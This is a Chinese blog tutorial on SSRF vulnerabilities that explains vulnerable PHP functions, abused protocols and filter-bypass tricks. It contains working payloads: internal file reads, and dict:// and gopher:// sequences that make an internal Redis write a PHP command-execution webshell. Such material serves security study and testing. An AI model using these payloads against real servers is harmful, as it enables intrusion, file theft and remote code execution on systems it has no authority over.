SSRF初认识

最新推荐文章于 2024-06-22 12:53:35 发布
最新推荐文章于 2024-06-22 12:53:35 发布
阅读量1.8k 收藏 4
点赞数 2
分类专栏: SSRF 文章标签: 网络 服务器 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_52501704/article/details/127973533
版权

前言

最近在一次代码审计过程中发现了一处SSRF漏洞,立即就精神了起来,脑海中出现了各种利用方式,实际去利用的时候发现存在很多的问题。所以就想趁着这个机会把SSRF漏洞做一个总结。

SSRF漏洞是什么

定义

SSRF也就是服务端请求伪造,是指攻击者向服务端发送包含恶意URI链接的请求,借由服务端去访问此URI,以获取保护网络资源的安全漏洞,是常见的web安全漏洞的一种

上述中有一个比较重要的点,就是攻击者发送链接,由服务端去请求。这种方式常常可以用来绕过网络的限制,攻击我们无法直接访问的网络。

可能存在SSRF的功能点

  • 1)分享:通过URL地址分享网页内容
  • 2)在线翻译
  • 3)图片的加载与下载:通过URL地址加载或下载图片,要注意区分是客户端发送的请求还是服务端发送的请求
  • 4)图片,文章收藏功能
  • 5)未公开的api实现以及其他调用URL的功能

PHP中可以造成SSRF的函数

  • 1)file_get_contents():把整个文件读入一个字符串中;支持http(s),file协议,在PHP5.4上测试不支持dict,ghoper协议。也有可能是我操作方式不对,在file_get_contents利用dict和ghoper协议大家有利用成功的吗?

  • 2)fsockopen():打开一个网络连接或者一个Unix套接字连接,在PHP5.4上测试只有http协议成功
  • 3)curl_exec():用于执行指定的CURL会话,支持的协议比较多,常用于SSRF的协议经过测试都支持,如dict,ghoper,file。有的协议需要一定的条件这点需要注意。

SSRF漏洞的危害

  • 1)扫描内网开放的端口
  • 2)读取主机任意文件
  • 3)攻击内网应用,如redis,mysql等

SSRF漏洞利用例子

在说SSRF漏洞利用以前先来说一下,SSRF经常利用的一些协议

  • 1)HTTP(s):最常用到的一种协议,这个就不多说了,可以用来验证是否存在SSRF漏洞,探测端口以及服务。
  • 2)file:本地文件传输协议,可以用来读取任意系统文件
  • 3)dict:字典服务器协议,dict是基于查询相应的TCP协议,服务器监听端口2628。在SSRF漏洞中可用于探测端口以及攻击内网应用
  • 4)ghoper:互联网上使用的分布型的文件搜集获取网络协议,出现在http协议之前。可用于攻击内网应用,可用于反弹shell。

由于curl支持的协议比较多,所以下面的例子中都是使用curl来进行操作的。

探测内网端口和服务

探测内网端口和服务一般使用http和dict协议。如下面所示,在有回显的情况下,可以直接确认服务端开启了redis服务。我们也可以直接爆破来批量测试服务端开始了那些端口。

?url=dict://127.0.0.1:6379

 读取任意文件

在有回显的情况下,可以使用file协议来读取内网任意文件。

?url=file:///etc/passwd

 

攻击内网应用

攻击内网应用需要用到dict协议或者ghoper协议。下面以攻击redis协议为例。

1)利用dict协议写入webshell

利用这种方式需要知道网站的绝对路径,目录有写入权限,以及redis没有密码或者弱密码(可以爆破弱密码)。

具体的payload如下:

?url=dict://127.0.0.1:6379/info

?url=dict://127.0.0.1:6379/config:set:dir:/var/www/html

?url=dict://127.0.0.1:6379/config:set:dbfilename:webshell.php

?url=dict://127.0.0.1:6379/set:webshell:"\x3c\x3f\x70\x68\x70\x20\x70\x68\x70\x69\x6e\x66\x6f\x28\x29\x3b\x3f\x3e"

?url=dict://127.0.0.1:6379/save

2)利用gopher协议写入webshell

payload:?url=

gopher%3a//127.0.0.1%3a6379/_%252A1%250D%250A%25248%250D%250Aflushall%250D%250A%252A3%250D%250A%25243%250D%250Aset%250D%250A%25241%250D%250A1%250D%250A%252434%250D%250A%250A%250A%253C%253Fphp%2520system%2528%2524_GET%255B%2527cmd%2527%255D%2529%253B%2520%253F%253E%250A%250A%250D%250A%252A4%250D%250A%25246%250D%250Aconfig%250D%250A%25243%250D%250Aset%250D%250A%25243%250D%250Adir%250D%250A%252413%250D%250A/var/www/html%250D%250A%252A4%250D%250A%25246%250D%250Aconfig%250D%250A%25243%250D%250Aset%250D%250A%252410%250D%250Adbfilename%250D%250A%25249%250D%250Ashell.php%250D%250A%252A1%250D%250A%25244%250D%250Asave%250D%250A%250A

上面的payload是经过两次url编码的,因为GET会进行一次编码,curl也会进行一次编码。

 

ghoper可以用来攻击众多的内网应用,具体的payload可以通过githunb上开源的一个程序来生成。链接为:https://github.com/tarunkant/Gopherus

SSRF绕过技巧

绕过IP限制

有些网站可能会限制访问的IP,此时可以通过下面的方式进行绕过:

  • 1)使用IPV6地址
  • 2)对IP转化成十进制,八进制等,如0177.0.0.01(八进制)
  • 3)利用特殊域名。xip.io可以指向任意域名,即127.0.0.1.xip.io,可解析为127.0.0.1
  • 4)利用句号。如127。0。0。1
  • 5)可以[::]。如http://[::]:80/
  • 6)利用短网址。比如百度短地址

绕过URL解析限制

如果网站限制了使用URL,可以尝试下面的方法绕过:

  • 1)使用@符号绕过:如127.0.0.1@evil.com
  • 2)利用302跳转,需要一个vps,把302转换的代码部署到vps上,然后去访问,就可跳转到内网中

总结

开头说审计到的那个SSRF漏洞使用的是file_get_contents函数并且没有任何回显,读取本地文件是不可能的了,本来想着是不是可以直接盲打redis应用,通过测试发现在file_get_contents函数中并不能使用dict和ghoper协议。网上看到有的文章说是可以使用这两个协议,可能是我本人比较菜,操作方式不对,如果大家对于这种无回显并使用file_get_contents函数的漏洞有什么好的方法,希望大家赐教。

H1111B
关注
  • 2
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
SSRF漏洞
现代鲁滨逊的博客
08-17 348
文章目录一 、介绍二、成因三、SSRF 漏洞出现的场景PHP相关函数四、ssrf利用五、漏洞判断1.回显2.延时3.DNS请求六、防御 一 、介绍 ssrf(Server-Side Request Forgery:服务器端请求伪造): 是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。一般情况下,SSRF攻击的目标是从外网无法访问的内部系统。(正是因为它是由服务端发起的,所以它能够请求到与它相连而与外网隔离的内部系统) 二、成因 都是由于服务端提供了从其他服务器应用获取数据的功能且没有对目标地址做过滤与
WebLogic SSRF 及漏洞修复
11-25
WebLogic SSRF 及漏洞修复方法 CVE-2014-4210 10.0.2,10.3.6
SSRF最全总结(协议,绕过)
weixin_50464560的博客
01-13 1万+
https://www.anquanke.com/post/id/262430#h3-46   SSRF-Labs配置 有些学者喜欢用这个靶场,讲下怎么搭建 我用的是Ubuntu18;docker和docker-compose配置可以参考vulhub官网的配置;下面是谷歌搜的 $ curl -sSL https://get.docker.com/ | sh #脚本安装docker $ apt install docker-compose #安装docker compose Basic关和
php代码审计8之SSRF
划水的小白白
07-04 323
1、关注函数 2、SSRF支持的协议 2.1、http/https: 2.2、file: 2.3、dict: 2.4、gopher: 2.5、ftp/ftps: 2.6、tftp: 2.7、imap/imaps/pop3/smtp/smtps: 2.8、telnet: 3、绕过 3.1、读取文件绕过 4、修复
一篇文章教你学会SSRF漏洞
最新发布
a770067334的博客
06-22 967
1.1w字文章,包括SSRF漏洞介绍、原理、攻击和利用方式、SSRF利用的协议、常见的漏洞函数、可能出现漏洞的点、SSRF的危害、SSRF的防御、SSRF绕过bypass、SSRF的优势、SSRF漏洞绕过方法、常用常见限制及绕过方法、SSRF修复建议、漏洞演示、SSRF利用的
SSRF攻击与Gopher协议
RuiLike的博客
06-04 1286
Gopher定义Gopher是Internet上一个非常有名的信息查找系统,它将Internet上的文件组织成某种索引,很方便地将用户从Internet的一处带到另一处。在WWW出现之前,Gopher是Internet上最主要的信息检索工具,Gopher站点也是最主要的站点,使用tcp70端口。但在WWW出现后,Gopher失去了昔日的辉煌。现在它基本过时,人们很少再使用它;gopher支持发出GET、POST请求。
SSRF总结
weixin_74020633的博客
04-11 768
先访问flag.php,抓包看看,发现key值,需要运用Gopher协议,传参key值来访问flag.php 构造一个POST请求 得到payload,在%0A(换行符)之前加上%0D 进行一次url编码 打开环境,提示我们攻击一下fastcgi协议,然后看看题目附件,附件中详细介绍了Fastcgi协议先读取网站看看有没有什么东西,说明存在index.php 攻击Fastcgi协议需要用到Gopher工具,运行工具,先输入网站存在的默认文件位置执行参数用一句话木马,把一句话木马进行b
ssrf的三个协议
m0_62422842的博客
05-16 1388
gopher协议 什么是gopher协议呢? Gopher是Internet上一个非常有名的信息查找系统。在WWW出现之前,Gopher是Internet上最主要的信息检索工具。但在www出现后,Gopher就没落了。 gopher协议支持发出GET、POST请求:可以先截获get请求包和post请求包,在构成符合gopher协议的请求。gopher协议ssrf利用中最强大的协议 这个协议在各个语言的限制 gopher协议的格式: URL:gopher://<host>:&.
SSRF_ex:SSRF漏洞测试、利用 SSRF vulnerability testing and utilization
05-08
SSRF_exSSRF漏洞测试、利用 SSRF vulnerability testing and utilizationSSRF[+] 服务端请求伪造,当作跳板攻击内网服务[+] 扫描内部网络、服务[+] 访问本机敏感文件[+] 向特定端口发送数据包、payload.├── ...
SSRF bible. Cheatsheet
08-06
SSRF bible. Cheatsheet SSRF attack and sockets presentation.
SSRF(通过时间判断) 点击保存头像,开启burpsuite抓包
10-07
SSRF(Server-Side Request Forgery,服务器端请求伪造)是一种常见的网络安全漏洞,它允许攻击者利用服务器网络权限发起对外部资源的请求。在这个场景中,通过时间延迟的判断方法,攻击者能够探测内网中的某些...
WEB攻防-SSRF服务端请求&Gopher伪协议&无回显利用&黑白盒挖掘&业务功能点
siu~
09-18 1621
1、SSRF-原理-外部资源加载 2、SSRF-利用-伪协议&无回显 3、SSRF-挖掘-业务功能&URL参数
Day57:WEB攻防-SSRF服务端请求&Gopher伪协议&无回显利用&黑白盒挖掘&业务功能点
qq_61553520的博客
03-30 1743
小迪安全-Day57:WEB攻防-SSRF服务端请求&Gopher伪协议&无回显利用&黑白盒挖掘&业务功能点
SSRF漏洞原理攻击与防御(超详细总结)
热门推荐
hello
04-09 5万+
SSRF漏洞原理攻击与防御 目录 CSRF漏洞原理攻击与防御一、SSRF是什么?二、SSRF漏洞原理三、SSRF漏洞挖掘四、产生SSRF漏洞的函数五、SSRF中URL的伪协议六、SSRF漏洞利用(危害)七、SSRF绕过方式八、SSRF漏防御 提示:以下是本篇文章正文内容,下面案例可供参考 一、SSRF是什么? SSRF(Server-Side Request Forgery:服务器端请求伪造) 是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。 一般情况下,SSRF攻击的目标是从外网无法访问的内部系
SSRF服务器端请求伪造漏洞基础
..
02-17 2656
SSRF服务器端请求伪造漏洞基础,下面分四个专题来说 1、什么是ssrf? 2、ssrf的相关协议 3、ssrf如何利用? 4、ssrf漏洞的绕过 5、ssrf漏洞的加固 一、什么是ssrf? SSRF是一种由攻击者构造形成并由服务器端发生的恶意请求的一个安全漏洞,正因为恶意请求由服务器端发起,而服务器端可以请求到与自身相连并且和外部网络隔绝的内部网络系统。所以一般情况下,SSRF的攻击目标是外网无法直接访问的内网系统。 借一下别人的图片展示一下这个过程: 由于业务需求
SSRF一—WEB攻防-SSRF服务端请求&Gopher伪协议&无回显利用&黑白盒挖掘&业务功能点
zyw268的博客
03-25 342
黑盒WEB-业务功能&URL关键字。SSRF-原理&挖掘&利用&修复。白盒CTF-绕过&伪协议&审计点。
web渗透】SSRF漏洞超详细讲解
dzqxwzoe的博客
01-23 1065
SSRF(Server-Side Request Forgery:服务器端请求伪造)是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。一般情况下,SSRF是要目标网站的内部系统。(因为他是从内部系统访问的,所有可以通过它攻击外网无法访问的内部系统,也就是把目标网站当中间人)探测目标端口如果目标未开放探测的端口,则会立马产生回显如果对方开放了所探测的端口,页面将会一直处于加载中的状态。
SSRF—服务器请求伪造 漏洞详解
m0_69043895的博客
04-21 1445
SSRF(Server-Side Request Forgery:服务器端请求伪造) 是一种由攻击者构造,由服务端发起请求的一个网络攻击,一般用来在外网探测或攻击内网服务,其影响效果根据服务器用的函数不同,从而造成不同的影响。SSRF 形成的原因大都是由于服务端提供了从其他服务器获取数据的功能且没有对目标地址做过滤与限制。比如从指定URL地址获取网页文本内容,加载指定地址的图片,下载等等。
ssrf redis
08-29
SSRF (Server Side Request Forgery) 是一种攻击方式,通过欺骗服务器发起伪造的请求来访问受信任的内部资源。Redis 是一种流行的开源内存数据库。 如果你想通过 SSRF 进行 Redis 的攻击,可能的方式包括: 1. 访问 Redis 未授权的端口:Redis 默认监听在 6379 端口,如果你能够通过 SSRF 访问到该端口,并且 Redis 没有进行适当的身份验证和授权配置,那么你可能能够执行一些恶意操作,如读取或修改 Redis 中的数据。 2. 利用 Redis 的特殊功能:Redis 提供了一些特殊功能和命令,如远程代码执行、文件系统访问等。如果你能够通过 SSRF 发起有效的 Redis 命令,可能会导致服务器执行恶意操作。 需要注意的是,SSRF 攻击是一项严重的安全问题,可以导致数据泄漏、远程代码执行等风险。为了保护系统安全,建议在开发和部署过程中采取适当的安全措施,如限制服务器对内部资源的访问、使用防火墙、进行身份验证和授权等。同时,定期更新和修补软件漏洞也是很重要的。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值